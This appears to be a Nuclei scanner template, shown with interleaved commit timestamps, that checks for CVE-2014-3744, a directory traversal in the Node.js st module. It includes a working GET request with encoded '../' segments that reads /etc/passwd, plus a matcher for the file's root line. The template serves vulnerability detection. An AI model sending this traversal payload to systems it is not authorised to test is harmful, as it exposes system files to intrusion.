2021-05-17 13:18:10 +00:00
id : CVE-2014-3744
info :
name : Node.js st module Directory Traversal
author : geeknik
2022-04-22 10:38:41 +00:00
severity : high
2022-02-25 14:32:23 +00:00
description : A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal.
2021-08-18 11:37:49 +00:00
reference :
2022-02-25 14:32:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
2021-05-17 14:02:49 +00:00
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
2021-05-17 13:18:10 +00:00
- https://snyk.io/vuln/npm:st:20140206
2022-05-17 09:18:12 +00:00
- https://nodesecurity.io/advisories/st_directory_traversal
2023-07-11 19:49:27 +00:00
- http://www.openwall.com/lists/oss-security/2014/05/13/1
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2014-3744
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.00672
2023-11-12 10:53:59 +00:00
epss-percentile : 0.77479
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : nodejs
product : node.js
tags : cve,cve2014,lfi,nodejs,st
2021-05-17 13:18:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-05-17 13:18:10 +00:00
- method : GET
path :
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-11-12 10:53:59 +00:00
# digest: 4b0a00483046022100b3d96d2a3fcc3965163291d8a7acca4a41f7ae77d7cffbe3ef22a2869490f177022100892c0d4861b88683293fb0b3fc977e78f88005a31b44914f26fe5c99f5133f6e:922c64590222798bb761d5b6d8e72950